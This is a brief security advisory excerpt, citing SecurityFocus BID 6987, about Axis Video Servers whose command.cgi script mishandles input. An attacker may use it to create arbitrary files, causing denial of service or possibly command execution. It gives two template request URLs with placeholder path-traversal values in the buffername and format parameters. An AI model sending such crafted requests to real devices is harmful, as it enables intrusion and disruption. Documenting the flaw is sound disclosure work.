source: https://www.securityfocus.com/bid/6987/info
It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.
http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]
http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]